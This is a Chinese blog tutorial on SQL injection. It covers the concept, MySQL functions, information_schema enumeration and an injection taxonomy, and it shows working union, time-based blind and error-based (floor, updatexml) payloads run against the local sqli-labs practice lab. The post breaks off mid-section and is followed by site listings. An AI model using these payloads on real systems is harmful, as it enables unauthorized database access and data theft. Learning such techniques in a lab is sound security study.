SQL注入小总结

最新推荐文章于 2024-08-13 19:11:09 发布
最新推荐文章于 2024-08-13 19:11:09 发布
阅读量786 收藏 15
点赞数 8
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74608722/article/details/140936503
版权

1.什么是SQL注入?

sql 注入是一种将 sql 代码添加到输入参数中,传递到 sql 服务器解析并执行的一种攻击手法。

2.SQL注入的原理

SQL 是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用 SQL。而 SQL 注入是将 Web 页面的原 URL、表单域或数据包输入的参数,修改拼接成 SQL 语句,传递给 Web 服务器,进而传给数据库服务器以执行数据库命令。

3.形成SQL注入的原因

用户输入的数据被 SQL 解释器执行。

4.SQL注入的危害

1、攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
2、通过操作数据库对某些网页进行篡改;
3、修改数据库一些字段的值,嵌入网马链接,进行挂马攻击。
4、服务器被远程控制,被安装后门。可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
5、数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被篡改。
6、破坏硬盘数据,导致全系统瘫痪。

5.SQL注入基本知识

注:以下命令语句均基于 MySQL 数据库

(1)增删改查语句

  • 增 Insert

基本语法 `INSERT INTO 表名称 VALUES (值1, 值2,....)`
例子 `insert into student(name,sex,age) values('张三',18,'男')`

  • 删 delete

基本语法 `DELETE FROM 表名称 WHERE 列名称 = 值`
例子 `delete from student where id=1`

  • 改 update

基本语法 `UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值`
列子 `update student set name = '张三' where id=1`

  • 查 select

基本语法 `SELECT 列名称 FROM 表名称`
例子 `select * from student`

(2)系统函数

  • version()——MySQL 版本

    select version();

  • user()——数据库用户名

    select user();

  • database()——数据库名

    select database();

  • @@datadir——数据库路径

    select @@datadir;

(3)字符串连接函数

`concat(str1,str2,...)`没有分隔符地连接字符串
`concat_ws(separator,str1,str2,...)`含有分隔符地连接字符串
`group_concat(str1,str2,...)`连接一个组的所有字符串,并以逗号分隔每一条数据

(4)一般流程

Mysql 有一个系统数据库 information_schema,存储着所有的数据库的相关信息,一般的, 我们利用该表可以进行一次完整的注入。以下为一般的流程。

  • 猜数据库

方式一:select schema_name from information_schema.schemata`
方式二:select table_schema from information_schema.tables;

  • 猜某库的数据表

    `select table_name from information_schema.tables where table_schema=’xxxxx’`

    *猜某表的所有列

    `Select column_name from information_schema.columns where table_name=’xxxxx’`
方法二:select group_concat(column_name)from information_schema.columns ;

二、分类

根据输入参数分为

  • 数字型注入

  • 字符型注入

根据注入技巧分为

  • 联合注入

  • 盲注

  • 堆叠注入

  • 报错注入

  • 二次注入

  • 宽字节注入

根据提交类型分为

  • GET 注入

  • POST 注入

  • COOKIE 注入

  • HTTP 头部注入

1.根据输入参数分类的 SQL 注入

(1)数字型注入

我们经常可以看到这样的 url localhost/sqli-labs-master/sqli-labs-master/Less-24/?id=1 基于此种形式的注入,一般被叫做数字型注入,这是因为其注入点 id 类型为数字。这一类的 SQL 语句原型一般为 select * from 表名 where id=1。

(2)字符型注入

我们有时又会看到这样的 url url localhost/sqli-labs-master/sqli-labs-master/Less-24/?name=admin基于此种形式的注入,一般被叫做字符型注入,这是因为其注入点 name 类型为字符串。这一类的 SQL 语句原型一般为 select * from 表名 where name='admin'

2.根据注入技巧分类的 SQL 注入

(1)联合注入

什么是联合注入?

联合注入顾名思义,就是使用联合查询进行注入的一种方式,是一种高效的注入的方式,适用于有回显同时数据库软件版本是5.0以上的 MYSQL 数据库。

union 操作符介绍

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。

联合注入演示

使用 sqli-labs less1 进行联合注入的流程演示

爆数据库

`http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+`

爆 security 数据库的数据表

`http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+`

爆 users 表的列

`http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+`

爆数据

`http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,group_concat(username),3 from users--+`

(2)盲注

什么是盲注?

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时我们需要利用一些方法进行判断或尝试,这个过程称为盲注

盲注的分类
a.布尔盲注

什么是布尔盲注?

布尔盲注是指利用页面返回的对错信息来间接推测数据库中的信息的一种手段。(构造逻辑判断)

适用条件:布尔盲注一般适用于页面没有回显字段(不支持联合查询),且 web 页面返回 True 或者 false 时。

常用函数

截取函数:left() right() substr() mid()
转换函数:ascii() hex()
比较函数:if()
b.时间盲注

什么是时间盲注?

时间盲注又称延时注入,指通过页面执行的时间来判断数据内容的注入方式。

什么时候使用?

当注入时,无论我们传入什么值,网页正常或报错都显示一种页面时,那么网页的是否正常显示将不是我们用来判断是否注入成功的依据,就要用基于时间的盲注。

方法:通过if判断语句与 sleep 函数结合,通过网站访问的响应时间来判断sql语句的正确性

示例:

`if(left(database(),1)='s',0,sleep(3))`

这段 payload 的含义是如果数据库的第一位为's'时,网页正常执行,否则延时3秒

c.报错盲注

什么是报错盲注?

是指通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来的注入方式

什么时候使用:当正常的回显注入无法显示结果,网页可以显示报错信息时,就可以使用报错注入

常见的报错函数

1)floor 报错注入

在进行报错注入时,floor()函数一般需要与rand()、count()、group by联用。

示例

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a

原理

rand() 随机产生0~1的数值,floor() 向下取整,所以 floor(rand()*2结果是0或1。

group by 用于分组,当同时执行count和group by函数时,MYSQL会创建一个虚拟表,虚拟表进行计数和分组。在执行group by语句的时候,group by语句后面的字段会被运算两次。

floor会报错的原因就是group by在向临时表插入数据时,插入重复主键导致的报错,又因为报错之前concat()里的语句已经执行过了,所以会直接爆出concat函数里执行后的结果

select floor(rand(0)*2) x from users group by x; 
select count(*),floor(rand(0)*2) x from users group by x;

 updatexml 报错注入

示例: `updatexml(1,concat(0x7e,(select @@version),0x7e),1)

原理

不变的梦
关注
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入总结
qq_46081990的博客
04-22 4006
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
SQL注入学习总结
YouthBelief的博客
10-09 4631
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
sql注入总结
weixin_51692662的博客
08-16 830
sql注入,web安全,数据库
SQL注入知识总结
ma963852的博客
03-30 9842
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
SQL注入实战总结
qq_44657899的博客
06-16 1414
文章目录0x01 联合注入:union0x02 boolean注入 盲注 0x01 联合注入:union database()库名 user()用户 version()版本号 load_file('/etc/passwd') group_concat(password) 0x02 boolean注入 盲注 基本思路 and 1=1 返回1 yes and 1=2 返回0 no 判断数据库长度 ' and lenth(database())>=4 --+ 判断数据库名字 ' and substr(d
SQL注入非常详细总结
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
CTF-SQL注入总结
SWC0619的博客
03-11 8269
SQL注入总结(一)
sql注入详细总结
qq_61991235的博客
02-13 2449
SQL注入详细总结 注:菜鸡笔记,酌情参考,欢迎指正 SQL注入原理 当对用户传入数据过滤不严格时,用户可在 Web表单递交 或 输入域名或 `页面请求处提交查询的SQL语句,将这些查询语句传递给后端数据执行,从而引发实际执行的语句与预期执行的语句不同,导致数据库原有的信息泄露,篡改,甚至删除。 sql关键字 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 注: information_schema.
SQL注入测试总结
07-11 4万+
SQL注入测试总结本文以MySQL数据库为例,其它数据库仅供参考。1 黑盒测试1.1 手工测试Web应用的主要注入点有:① POST请求体中的参数② GET请求头URL中的参数③ Cookie1.1.1 内联注入1、字符串内联注入测试字符串变种预期结果'N/ A触发数据库返回错误。' OR '1' = '1') OR ('1' = '1永真,返回所有行。value' OR '1' = '2valu...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
防御SQL注入的方法总结
09-10
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL代码来操纵数据库,获取、修改、删除敏感信息,甚至完全控制数据库系统。防御SQL注入是保护网站和应用程序免受此类攻击的关键步骤。 1. SQL注入的...
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
数据库:数据定义和数据库的完整性
茜茜西西的博客
08-13 512
建立一个数据库XSCJ,自行规定各项参数;建立Course表,录入数据库表中相应元组;修改Course表增加一列,开课学期,数据类型自定义;为Course表的Cname列建立唯一索引,索引名Cname_idx;删除唯一索引Cname_idx;删除基本表Student;删除数据库XSCJ 拓展:创建一个名为BSXT的数据库,初始大小5MB,最大大小10MB,允许数据库自动增长,增长方式按10%比例增长;日志文件初始为2MB,最大可增长到5MB,按1MB增长;将BSXT数据库的主数据文件最大大小改为不限制;
MySQL学习[4] ——MySQL锁
最新发布
shenfenxihuan的博客
08-13 589
全局锁就是**对整个数据库实例加锁全库逻辑备份**等场景。加上全局(读)锁后,整个数据库都是。若数据库的数据较多,导致整个处理流程较慢,数据库长时间为只读状态,造成业务停滞、服务长时间不可用。因此,由于,在备份数据库之前先开启事务。整个事务执行期间都在用这个 Read View,而且由于 MVCC 的支持,备份期间业务依然可以对数据进行更新操作。而如。
ORACLE 使用CONCAT()函数报错
calabash_man的博客
08-09 231
[TOC](ORACLE 使用CONCAT()函数报错)
Oracle【plsql编写九九乘法表】
只有登上山顶,才能看到那边的风光
08-08 270
😹 觉得博主文章写的不错的话,希望大家三连(✌关注,✌点赞,✌评论),多多支持一下!!!
SQL注入深度解析与防护策略
"SQL注入详解,黑客必学的技能,涉及SQL注入的各个方面,包括背景、原理、分类、渗透测试及具体攻击类型" 在网络安全领域,SQL注入是一种常见且危害极大的攻击方式,它主要针对使用SQL(结构化查询语言)的Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值